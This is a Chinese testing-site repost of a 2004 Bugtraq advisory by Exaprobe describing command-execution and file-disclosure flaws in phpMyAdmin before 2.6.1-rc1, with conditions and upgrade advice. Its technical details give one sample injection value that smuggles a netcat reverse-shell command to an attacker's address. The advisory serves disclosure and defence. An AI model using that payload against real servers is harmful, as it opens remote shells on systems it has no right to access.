• 软件测试技术
  • 软件测试博客
  • 软件测试视频
  • 开源软件测试技术
  • 软件测试论坛
  • 软件测试沙龙
  • 软件测试资料下载
  • 软件测试杂志
  • 软件测试人才招聘
    暂时没有公告

字号: | 推荐给好友 上一篇 | 下一篇

MultiplevulnerabilitiesinphpMyAdmin

发布: 2007-5-25 12:19 | 作者: 佚名 | 来源: 互连网 | 查看: 33次 | 进入软件测试论坛讨论

领测软件测试网 List:       bugtraq
Subject:    Multiple vulnerabilities in phpMyAdmin
From:       Nicolas Gregoire <ngregoire () exaprobe ! com>
Date:       2004-12-13 13:02:09
Message-ID: <1102942929.1530.220.camel () bobby ! exaprobe ! com>
[Download message RAW]

                                Exaprobe
                            www.exaprobe.com

                           Security Advisory

Advisory Name: Multiple vulnerabilities in phpMyAdmin
  Release Date: 13 December 2004
   Application: phpMyAdmin prior to 2.6.1-rc1
      Platform: Any webserver running PHP
      Severity: Remote code execution
        Author: Nicolas Gregoire <ngregoire@exaprobe.com>
Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
     Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html


Overview :
==========

phpMyAdmin is a tool written in PHP intended to handle the
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.


Technical details :
===================

Command execution :

- bug introduced in 2.6.0-pl2
- attacker does *not* need access to the phpMyAdmin interface
- PHP safe mode must be off
- external transformations must be activated
- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

- attacker need access to the phpMyAdmin interface
- PHP safe mode must be off
- $cfg['UploadDir'] must be defined
- exploitation is done via 'sql_localfile'


Vendor Response :
=================

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.


Recommendation :
================

Upgrade to 2.6.1-rc1 or newer.
Desactivate uploads and transformations if possible.


CVE Information :
=================

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

  CAN-2004-1147  Command execution in phpMyAdmin
  CAN-2004-1148  File disclosure in phpMyAdmin

--
Nicolas Gregoire ----- Consultant en S閏urit?des Syst鑝es d'Information
ngregoire@exaprobe.com ------[ ExaProbe ]------ http://www.exaprobe.com/
PGP KeyID:CA61B44F  FingerPrint:1CC647FF1A55664BA2D2AFDACA6A21DACA61B44F

延伸阅读

文章来源于领测软件测试网 https://www.ltesting.net/

软件测试论坛

领测软件测试网最新更新
软件测试技术相关文章

软件测试培训信息
最新软件测试技术专题
最新领测软件测试网新闻
软件测试技术文章排行榜
  • 编辑推荐
  • 周排行
  • 月排行
软件测试技术分类最新内容
关于领测软件测试网 | 领测软件测试网合作伙伴 | 广告服务 | 投稿指南 | 联系我们 | 网站地图 | 友情链接
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备10010545号-5
技术支持和业务联系:info@testage.com.cn 电话:010-51297073

软件测试 | 领测国际ISTQBISTQB官网TMMiTMMi认证国际软件测试工程师认证领测软件测试网